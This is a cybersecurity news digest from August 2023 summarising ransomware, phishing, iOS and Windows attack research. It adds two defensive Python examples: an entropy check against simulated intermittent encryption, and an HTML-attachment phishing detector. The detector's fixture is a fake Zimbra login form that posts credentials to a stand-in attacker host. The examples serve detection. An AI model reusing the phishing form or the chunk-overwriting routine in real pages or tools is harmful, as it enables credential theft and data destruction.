Cyber Briefing - 2023.08.18
What are the latest cybersecurity alerts, incidents, and news?
NoFilter, iOS 16, BlackCat, RemCom, Play Ransomware, SMS Bomber, Zimbra, Memecoin, Net Worker Alliance, Poland, 8BASE, ToyotaLift Northeast, NYC Data Breach, AI-Infused Fuzz Testing, Taiwan, Surge in Ransomware Profits, AnonFiles.
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
Cyber Alerts
A new privilege-escalation technique dubbed NoFilter abuses the Windows Filtering Platform (WFP), a built-in component of the Windows operating system. Demonstrated by cybersecurity firm Deep Instinct, the technique manipulates WFP to duplicate access tokens and elevate from a local administrator to "NT AUTHORITY\SYSTEM", giving an attacker the highest local authority while leaving minimal traces. Because it relies on a legitimate OS component rather than dropped tooling, defenders cannot count on file-based detection alone and need to watch for this kind of token manipulation on Windows systems.
Cybersecurity researchers at Jamf Threat Labs have unveiled an exploit technique against Apple's iOS 16 that lets an attacker keep access to a device even after the user enables Airplane Mode. The method creates a fake Airplane Mode: the icon is shown and the device appears to drop its cellular connection, while the attacker's application retains a covert cellular data connection. It works by modifying both the user interface (UI) and the per-app cellular data access, so a rogue payload stays under the radar by mimicking the behavior of the legitimate Airplane Mode. The research describes a post-exploitation technique, meaning the device must already be compromised, but it challenges the assumption that Airplane Mode guarantees the device is offline.
Microsoft has revealed a new version of the BlackCat ransomware, also known as ALPHV and Noberus. This version bundles the open-source Impacket framework and the RemCom remote-shell tool to facilitate lateral movement and remote code execution. Bundling these tools lets the ransomware spread more effectively inside target environments and marks a further evolution in the operators' tactics.
The Play ransomware group is targeting managed service providers for initial network access and exploiting aging vulnerabilities in security appliances. Kevin O'Connor, director of threat research at Adlumin, notes that attacking through security vendors is shrewd because it often grants attackers unimpeded access under the guise of legitimate administrative activity. The group also uses intermittent encryption, encrypting only portions of each file, to evade detection, and is focusing on midsize financial, software, legal, and logistics organizations across the US, UK, Australia, and Italy. Play's arsenal now includes new exploits and a range of older vulnerabilities, including Fortinet SSL VPN's CVE-2018-13379, underscoring the need for thorough patching and continued vigilance.
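Play's intermittent encryption, mentioned above, matters to defenders because it undermines a common heuristic: flagging files whose overall entropy jumps to ciphertext levels. The Python below is an added example, not code from Adlumin or from any vendor named on this page. It simulates partial encryption by overwriting every n-th 4 KiB chunk of a constructed sample file with seeded pseudo-random bytes that stand in for ciphertext (no real cipher is used), then compares a whole-file Shannon-entropy check against a per-chunk check. The chunk size, the 7.0 bits-per-byte threshold and the sample text are assumptions chosen for the demonstration.

```python
import math
import random
from collections import Counter

CHUNK = 4096          # assumed granularity for both the simulated encryptor and the checker
THRESHOLD = 7.0       # assumed bits-per-byte cutoff; uniform random bytes score close to 8.0


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input, at most 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def encrypt_intermittently(plaintext: bytes, every_nth: int,
                           chunk: int = CHUNK, seed: int = 1234) -> bytes:
    """Simulate intermittent encryption: every `every_nth` chunk (starting with the
    first) is overwritten with seeded pseudo-random bytes standing in for ciphertext.
    every_nth=1 models full-file encryption. No real cipher is involved."""
    rng = random.Random(seed)
    out = bytearray(plaintext)
    for i in range(0, len(out), chunk):
        if (i // chunk) % every_nth == 0:
            span = out[i:i + chunk]
            out[i:i + chunk] = rng.randbytes(len(span))
    return bytes(out)


def whole_file_flags(data: bytes, threshold: float = THRESHOLD) -> bool:
    """Naive heuristic: flag the file only if its overall entropy is high."""
    return shannon_entropy(data) >= threshold


def chunked_flags(data: bytes, threshold: float = THRESHOLD, chunk: int = CHUNK) -> bool:
    """Per-chunk heuristic: flag the file if any single chunk looks like ciphertext."""
    return any(shannon_entropy(data[i:i + chunk]) >= threshold
               for i in range(0, len(data), chunk))


def demo() -> dict:
    """Run both heuristics over an unencrypted, an intermittently encrypted and a
    fully encrypted copy of a constructed low-entropy sample document.
    Returns {name: (whole_file_verdict, per_chunk_verdict)}."""
    # constructed sample, ~67 KB of repetitive office-style text
    plaintext = b"Quarterly invoice ledger, row entries repeated for size. " * 1200
    partial = encrypt_intermittently(plaintext, every_nth=4)   # roughly 1 in 4 chunks
    full = encrypt_intermittently(plaintext, every_nth=1)
    return {
        "plain": (whole_file_flags(plaintext), chunked_flags(plaintext)),
        "intermittent": (whole_file_flags(partial), chunked_flags(partial)),
        "full": (whole_file_flags(full), chunked_flags(full)),
    }


if __name__ == "__main__":
    for name, (whole, chunked) in demo().items():
        print(f"{name:12s} whole-file={str(whole):5s} per-chunk={chunked}")
```

The whole-file check catches the fully encrypted copy but misses the intermittently encrypted one, because three quarters of the bytes are still plaintext and drag the average down; the per-chunk check flags both. Real detections combine this with file-write rate, extension changes and process lineage, since high-entropy chunks also occur legitimately in compressed or already-encrypted files.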
Cybersecurity researchers have uncovered a growing trade on underground forums in SMS Bomber attack tools. These attacks flood a victim's phone number with a barrage of text messages, causing disruption through constant vibrations, alert sounds, and notifications. SOCRadar researchers found that the tools are distributed not only through underground forums but also via messaging and open-source platforms such as Telegram, ICQ, Discord, GitHub, and Replit. The services on offer cover email, voice-call and SMS flooding, with rates as low as $0.03 per spam SMS. The findings underscore the need for better protection and countermeasures against this type of attack.
In an ongoing phishing campaign that began in April 2023, cybercriminals are targeting Zimbra Collaboration email servers worldwide to steal user credentials, according to a recent report by ESET. The phishing emails impersonate an organization's administrator and warn of an upcoming email server update, instructing users to open an HTML attachment to avoid temporary account deactivation. The attached HTML file renders a fake Zimbra login page with the recipient's username already filled in, which tricks victims into entering their password. Despite its lack of sophistication, the campaign's widespread success highlights the need for greater awareness among Zimbra Collaboration users.
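The Zimbra lure above rides on an HTML attachment that carries a login form with the recipient's address prefilled. The Python below is an added example, not ESET's code or Zimbra's: it parses an attached HTML file with the standard-library html.parser, finds forms containing a password field, and flags the combination that matches the campaign's pattern (prefilled username, form posting to a host outside the organization's own domains). The sample HTML, the trusted domain corp.example and the attacker host are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect every <form> in the document together with the <input> elements inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}      # valueless attributes arrive as None
        if tag == "form":
            self._current = {"action": a.get("action", ""), "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append({
                "type": (a.get("type") or "text").lower(),
                "name": a.get("name", ""),
                "value": a.get("value", ""),
            })

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _on_trusted_domain(host: str, trusted_domains) -> bool:
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in trusted_domains)


def assess_html_attachment(html: str, trusted_domains) -> dict:
    """Score the most suspicious credential form in an e-mailed HTML file.
    verdict is one of: no_credential_form, review, credential_phishing_likely."""
    scanner = _FormScanner()
    scanner.feed(html)
    result = {"verdict": "no_credential_form", "reasons": [], "action_host": ""}
    for form in scanner.forms:
        inputs = form["inputs"]
        if not any(i["type"] == "password" for i in inputs):
            continue                                    # not a login form
        reasons = ["password field inside an e-mailed HTML file"]
        if any(i["type"] in ("text", "email") and i["value"] for i in inputs):
            reasons.append("username prefilled in the attachment")
        host = urlparse(form["action"]).hostname or ""
        if host and not _on_trusted_domain(host, trusted_domains):
            reasons.append("form posts to untrusted host " + host)
        verdict = "credential_phishing_likely" if len(reasons) >= 2 else "review"
        if len(reasons) > len(result["reasons"]):
            result = {"verdict": verdict, "reasons": reasons, "action_host": host}
    return result


# Constructed attachment mimicking the lure: prefilled user, posts to an attacker host.
PHISH_HTML = """<html><body><h2>Mail server update</h2>
<form method="post" action="https://mail-upgrade.example-attacker.net/zimbra/auth">
  <input type="text" name="username" value="jdoe@corp.example">
  <input type="password" name="password">
  <input type="submit" value="Sign in">
</form></body></html>"""

# Constructed benign page: ordinary login form on the organization's own host, nothing prefilled.
BENIGN_HTML = """<html><body>
<form method="post" action="https://mail.corp.example/">
  <input type="text" name="username">
  <input type="password" name="password">
</form></body></html>"""

if __name__ == "__main__":
    for label, doc in (("phish", PHISH_HTML), ("benign", BENIGN_HTML)):
        print(label, assess_html_attachment(doc, ["corp.example"]))
```

Any password form in an e-mailed HTML file is worth a look, so a lone password field still returns "review"; the prefilled username or an off-domain action pushes the verdict to "credential_phishing_likely". A real gateway rule would also inspect JavaScript that builds the form or posts the credentials dynamically, which this parser does not attempt.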
In a recent incident, a hacker targeted RocketSwap, a decentralized exchange on the Base network, and siphoned off 471 ETH, equivalent to approximately $860,000. The stolen funds were swiftly bridged to the Ethereum mainnet, where the attacker launched a new memecoin called $LoveRCKT and seeded a Uniswap liquidity pool pairing it with 400 ETH. Despite accusations that RocketSwap's own team was involved, the exchange maintains that the breach was carried out by an external malicious actor who exploited a weakness stemming from its use of offline signatures.
Poland faces another cyber attack, this time attributed to the "Net Worker Alliance" threat group. The group has claimed responsibility for targeting significant Polish websites, including the Warsaw Stock Exchange (GPW), Warsaw Chopin Airport, PGZ Stocznia Wojenna, and Port of Gdynia Authority S.A. The motives behind the attack remain unclear, raising concerns about Poland's cybersecurity readiness.
Reports suggest that ToyotaLift Northeast may have fallen victim to a cyber attack, with a hacker collective claiming to have compromised its data and demanding a ransom. The company has not confirmed the attack, but the alleged hackers assert that they possess ToyotaLift Northeast's data. ToyotaLift Northeast, a prominent provider of forklift and material-handling services on the US east coast, faces uncertainty as the situation unfolds.
New York City's Department of Finance mistakenly emailed a list of its employees' personal information, including home addresses, cell phone numbers, and email addresses, to all of its staff as part of a failed test of its emergency notification system. The mishap also triggered automated calls to employees in the early hours of the morning, raising concerns about the security of their data. The department is investigating the matter, and the exposure has raised worries that the information could be misused by unauthorized parties.
Cyber News
Google has added generative AI to its open-source fuzz testing infrastructure, with results that could reshape automated bug-hunting. By integrating large language models into its OSS-Fuzz project, Google achieved substantial improvements in code coverage, a key metric in vulnerability research. The models automatically write new fuzz targets for projects, allowing security improvements to scale across a wide array of codebases; the experiment showed code coverage increases of up to 31% in some projects without human intervention.
Taiwan, a crucial node in global supply chains, faced a surge of cyberattacks during the first half of 2023, averaging 15,000 attacks per second, an 80 percent increase from the previous year, according to a report by Fortinet, a prominent US-based cybersecurity firm. The report stressed that Taiwan's pivotal role in supply chains makes it particularly attractive to attackers and urged Taiwanese corporations to bolster their security. With cybercriminals refining their tactics and devising more lucrative business models, Eric Wu, head of Fortinet Taiwan, underscored the escalating information security challenges faced by Taiwanese companies.
The threat landscape remains grim as ransomware stays highly profitable and zero-day exploits gain traction. The study, based on observations from Rapid7 researchers and managed services teams, counts over 1,500 ransomware victims worldwide in the first half of 2023. The report highlights the combination of substantial criminal profits and inadequate organizational defenses, with nearly 40% of incidents attributed to weak multi-factor authentication (MFA) enforcement. Despite ongoing efforts, the overall situation is expected to deteriorate because of the financial incentives for cybercrime and persistent security weaknesses.
Popular online file hosting platform AnonFiles has abruptly shut down, attributing its decision to the overwhelming levels of abuse on its platform. The administrators expressed their frustration with the challenges posed by users misusing the service, leading them to cease its operations after years of running an anonymous file-sharing site. AnonFiles, known for hosting millions of uploads, attracted both legitimate users and cybercriminals alike, highlighting the delicate balance between convenience and security in the world of online file sharing.
Copyright © 2023 CyberMaterial. All Rights Reserved.